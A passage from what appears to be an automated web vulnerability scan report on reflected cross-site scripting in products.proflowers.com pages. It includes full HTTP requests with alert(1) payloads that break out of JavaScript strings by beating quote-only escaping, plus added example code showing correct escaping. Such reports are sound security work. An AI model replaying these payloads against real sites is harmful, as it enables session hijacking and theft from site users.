   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
s.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050119","30050119","30050119","428477","72","fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\\";alert(1)//5e820bfb5e","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...
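
Two variants of the same JavaScript-string sink appear in this report: the mediaplex pages (1.106, 1.107, 1.109, 1.110) copy the parameter into a double-quoted string with no escaping at all, and the proflowers pages (1.112 onward) escape " with a backslash but leave backslashes in the input alone, so an attacker-supplied \ neutralises the added one. The block below is an added example, not code from the report or from either site; it uses the resx.cv3 assignment shape seen in the responses, while the escaper names, renderAssignment, endOfStringLiteral, literalIsConfined and recoverValue are made up for this illustration. It emits the assignment under three escaping strategies and walks the result the way the JavaScript lexer would, to show where each string actually ends.

```javascript
// Added example (not from the report, proflowers.com or mediaplex.com):
// why no escaping (1.106-1.110) and quote-only escaping (1.112-1.115) both
// let "…";alert(1)// escape a JavaScript string literal, and what works.
// Helper and constant names are this example's own.

// Constructed values in the shape Burp submitted them.
const NO_ESCAPE_VALUE = 'e5f65";alert(1)//e3cc197dac6';          // 1.106
const TRACKING_VALUE  = 'HIC3f89f\\";alert(1)//1611fbaf415';     // 1.113: HIC + payload, the \ is the attacker's

// Three ways a server might emit   resx.cv3 = "<value>";
const escapers = {
  none:       s => s,                                  // mediaplex: value copied verbatim
  quotesOnly: s => s.replace(/"/g, '\\"'),             // proflowers: escapes " but not \
  jsonSafe:   s => JSON.stringify(s).slice(1, -1)      // escapes \ before ", plus control chars
                     .replace(/</g, '\\u003c'),        // and keeps </script> out of inline <script>
};

function renderAssignment(value, escape) {
  return 'resx.cv3 = "' + escape(value) + '";';
}

// Walk the emitted source as the JS lexer would: a double-quoted literal
// ends at the first " not consumed by a preceding backslash. Returns the
// index just past the closing quote, or -1 if the literal never closes.
function endOfStringLiteral(src, openQuoteIndex) {
  for (let i = openQuoteIndex + 1; i < src.length; i++) {
    if (src[i] === '\\') { i++; continue; }  // skip the escaped character
    if (src[i] === '"') return i + 1;
  }
  return -1;
}

// Confined means: after the literal closes, only the intended ";" remains.
// Anything else (";alert(1)//…") is attacker code the engine would run.
function literalIsConfined(src) {
  const open = src.indexOf('"');
  const end = endOfStringLiteral(src, open);
  return end !== -1 && src.slice(end) === ';';
}

// What value the engine would actually assign. JSON.parse is a close
// enough reader for the literals these three escapers produce.
function recoverValue(src) {
  const open = src.indexOf('"');
  const end = endOfStringLiteral(src, open);
  return JSON.parse(src.slice(open, end));
}
```

With quotesOnly the emitted source is resx.cv3 = "HIC3f89f\\";alert(1)//1611fbaf415"; exactly as in the 1.113 response: the lexer reads \\ as one escaped backslash, the next " closes the string, and the rest of the line is executed. The fix is not to add more quote handling but to escape the escape character itself before anything else, which a JSON encoder does by construction; the extra \u003c replacement covers the case where the literal sits inside an inline <script> block, since the HTML parser would otherwise end the script at a </script> inside the string.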

1.113. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f89f\"%3balert(1)//1611fbaf415 was submitted in the trackingpgroup parameter. This input was echoed as 3f89f\\";alert(1)//1611fbaf415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC3f89f\"%3balert(1)//1611fbaf415&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:39:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:39:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:39:42 GMT
Content-Length: 165008


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC3f89f\\";alert(1)//1611fbaf415";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "fgvprtlsmsn_hp021111_unknown
...[SNIP]...

1.114. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66204\"%3balert(1)//2ea94e2c6c0 was submitted in the viewpos parameter. This input was echoed as 66204\\";alert(1)//2ea94e2c6c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=266204\"%3balert(1)//2ea94e2c6c0&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:38:29 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:38:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:38:29 GMT
Content-Length: 166358


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="266204\\";alert(1)//2ea94e2c6c0";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.99";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

1.115. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 859ae\"%3balert(1)//49c0c02e430 was submitted in the Ref parameter. This input was echoed as 859ae\\";alert(1)//49c0c02e430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated. The fix is to escape the backslash itself before escaping the quote (or, better, to serialize the value with a JSON encoder that also escapes <, / and the U+2028/U+2029 line terminators) rather than escaping quotation marks alone.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef859ae\"%3balert(1)//49c0c02e430&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:57:13 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:57:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:57:13 GMT
Content-Length: 161940


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007357","30007357","30007357","269248","72","HomeNoRef859ae\\";alert(1)//49c0c02e430","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

1.116. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ef8\"%3balert(1)//47481d06965 was submitted in the trackingpgroup parameter. This input was echoed as 43ef8\\";alert(1)//47481d06965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM43ef8\"%3balert(1)//47481d06965&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:55:01 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:55:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:55:01 GMT
Content-Length: 155943


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM43ef8\\";alert(1)//47481d06965";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "homenoref";
resx.cv15 = "";
...[SNIP]...

1.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63910\"%3balert(1)//baa6ca69c91 was submitted in the viewpos parameter. This input was echoed as 63910\\";alert(1)//baa6ca69c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
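The backslash-escape bypass described for findings 1.115, 1.116 and 1.117 (and the resx.cv22 / resx.cv3 assignments shown in their responses), reproduced as an added JavaScript example that is not part of the scan report or of the site's code. naiveJsEscape stands in for the observed server behaviour (quote escaped, backslash not); safeJsEscape is the hardened form. The function names and the payload string are constructed for illustration, and "injected=true" replaces alert(1) so the outcome can be checked without a browser.

```javascript
// Added example for findings 1.115-1.117 (not code from the scan report or
// from the site). naiveJsEscape mimics the observed server behaviour; the
// other names are hypothetical.

function naiveJsEscape(value) {
  // Prefixes every " with a backslash but leaves backslashes in the input
  // untouched, which is exactly the weakness the report describes.
  return String(value).replace(/"/g, '\\"');
}

function safeJsEscape(value) {
  // Backslash first (otherwise the later rules would double-escape their own
  // output), then the quotes, then characters the HTML parser or the JS
  // tokenizer treats specially inside a <script> block.
  return String(value)
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"')
    .replace(/'/g, "\\'")
    .replace(/</g, '\\u003c')      // neutralises </script> and <!--
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')      // only matters if the page is served as XHTML
    .replace(/\r/g, '\\r')
    .replace(/\n/g, '\\n')
    .replace(/\u2028/g, '\\u2028') // JS line terminators that are legal in JSON
    .replace(/\u2029/g, '\\u2029');
}

// Rebuilds the shape of the vulnerable statement from the responses
// (resx.cv22 = "...";) around the escaped value and runs it in a fresh
// function scope. Returns what the string variable holds afterwards and
// whether the trailing, attacker-controlled statement executed.
function embedAndRun(escaper, input) {
  const src =
    'var injected = false;\n' +
    'var cv22 = "' + escaper(input) + '";\n' +
    'return { value: cv22, injected: injected };';
  try {
    return new Function(src)();
  } catch (e) {
    // e.g. an unterminated string literal: report it instead of throwing
    return { value: null, injected: false, error: e.constructor.name };
  }
}

// Constructed payload in the report's shape: the attacker's own backslash
// absorbs the one the application adds, so the quote ends the string and
// the rest of the line runs. "injected=true" stands in for alert(1).
const PAYLOAD = '266204\\";injected=true//2ea94e2c6c0';

function demo() {
  return {
    // naive: injected is true and value is "266204" followed by one backslash
    naive: embedAndRun(naiveJsEscape, PAYLOAD),
    // safe: injected stays false and value round-trips to PAYLOAD unchanged
    safe: embedAndRun(safeJsEscape, PAYLOAD),
  };
}
```

The order of the replace calls in safeJsEscape is the whole point: escaping the backslash first is what stops an attacker-supplied backslash from cancelling the one added for the quote. In a real application the hand-rolled encoder should give way to a JSON serializer with the same <, > and line-terminator escaping applied to its output.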

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=163910\"%3balert(1)//baa6ca69c91&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:53:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:53:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:53:58 GMT
Content-Length: 157371


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="163910\\";alert(1)//baa6ca69c91";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.98";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

1.118. http://rover.ebay.com/idmap/0 [footer&cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

